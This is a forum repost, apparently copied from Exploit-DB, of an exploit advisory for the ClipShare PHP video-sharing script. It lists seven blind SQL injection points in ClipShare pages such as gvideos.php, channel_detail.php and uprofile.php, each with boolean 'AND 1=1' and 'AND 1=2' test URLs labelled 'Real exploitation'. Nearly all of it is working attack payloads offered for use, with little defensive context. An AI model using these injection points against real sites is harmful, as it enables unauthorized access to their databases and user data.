Exploit ClipShare 4.1.1 - Multiples Vulnerabilities

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
24894
Проверка EDB
  1. Пройдено
Автор
ESAC
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-5489 cve-2008-0089
Дата публикации
2013-03-27
ClipShare 4.1.1 - Multiples Vulnerabilities
Код:
# Exploit Title: ClipShare 4.1.1 - Multiples Vulnerabilites
# Exploit Author: Esac
# Vulnerable Software: ClipShare - Video Sharing Community Script 4.1.4
# Official site: http://www.clip-share.com
# Software License: Commercial.
#all versions are vulnerable:
#Last Checked: 27 March 2013

# Note : to exploit this vulnerability MAGIC_QUOTES_GPC directive must be turned off on server side.(php.ini)

==============================================================================================

vuln file : gvideos.php , param : gid 

Poc :

http://server/mavideo/gvideos.php?gid=1 [Blind]

#to exlploit this poc , must group to be added previously with some videos publics

Real exploitation :

http://server/mavideo/gvideos.php?gid=1 AND 1=1

==> return normal page

http://server/mavideo/gvideos.php?gid=1 AND 1=2
==> return page with some errors ( or with nothing - white page )


-------------------------------------------------------------------------------------------------------------------------------------------------


vuln file : channel_detail.php , param : chid

Poc :

http://server/mavideo/channel_detail.php?chid=4 [Blind]


Real exploitation :

http://server/mavideo/channel_detail.php?chid=4 AND 1=1
==> return normal page

http://server/mavideo/channel_detail.php?chid=4 AND 1=2
==> return page with some errors ( or with nothing - white page )


-------------------------------------------------------------------------------------------------------------------------------------------------

vuln file : uprofile.php , param : UID

Poc :

http://server/mavideo/uprofile.php?UID=66 [Blind]


Real exploitation :

http://server/mavideo/uprofile.php?UID=66 AND 1=1
==> return normal page

http://server/mavideo/uprofile.php?UID=66 AND 1=2
==> return page with some errors ( or with nothing - white page )


-------------------------------------------------------------------------------------------------------------------------------------------------

vuln file : ufavour.php , param : UID

Poc :

http://server/mavideo/ufavour.php?UID=66 [Blind]


Real exploitation :

http://server/mavideo/ufavour.php?UID=66 AND 1=1
==> return normal page

http://server/mavideo/ufavour.php?UID=66 AND 1=2
==> return page with some errors ( or with nothing - white page )


-------------------------------------------------------------------------------------------------------------------------------------------------
vuln file : ufriends.php , param : UID

Poc :

http://server/mavideo/ufriends.php?UID=66 [Blind]


Real exploitation :

http://server/mavideo/ufriends.php?UID=66 AND 1=1
==> return normal page

http://server/mavideo/ufriends.php?UID=66 AND 1=2
==> return page with some errors ( or with nothing - white page )


-------------------------------------------------------------------------------------------------------------------------------------------------
vuln file : uplaylist.php , param : UID

Poc :

http://server/mavideo/uplaylist.php?UID=66 [Blind]


Real exploitation :

http://server/mavideo/uplaylist.php?UID=66 AND 1=1
==> return normal page

http://server/mavideo/uplaylist.php?UID=66 AND 1=2
==> return page with some errors ( or with nothing - white page )


-------------------------------------------------------------------------------------------------------------------------------------------------
vuln file : ugroups.php , param : UID

Poc :

http://server/mavideo/ugroups.php?UID=66 [Blind]


Real exploitation :

http://server/mavideo/ugroups.php?UID=66 AND 1=1
==> return normal page

http://server/mavideo/ugroups.php?UID=66 AND 1=2
==> return page with some errors ( or with nothing - white page )


-------------------------------------------------------------------------------------------------------------------------------------------------

PwnEd.
Tested version:
Sunday , March 27, 2013 | Version: 4.1.4 | Username: admin | Logout
Copyright © 2006-2008 ClipShare. All rights reserved.
~ Game Over ~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greetz : White Tarbouch Team & Cobra & Dami 

==> Made In Moroco <==
./Esac
 
Источник
www.exploit-db.com

Похожие темы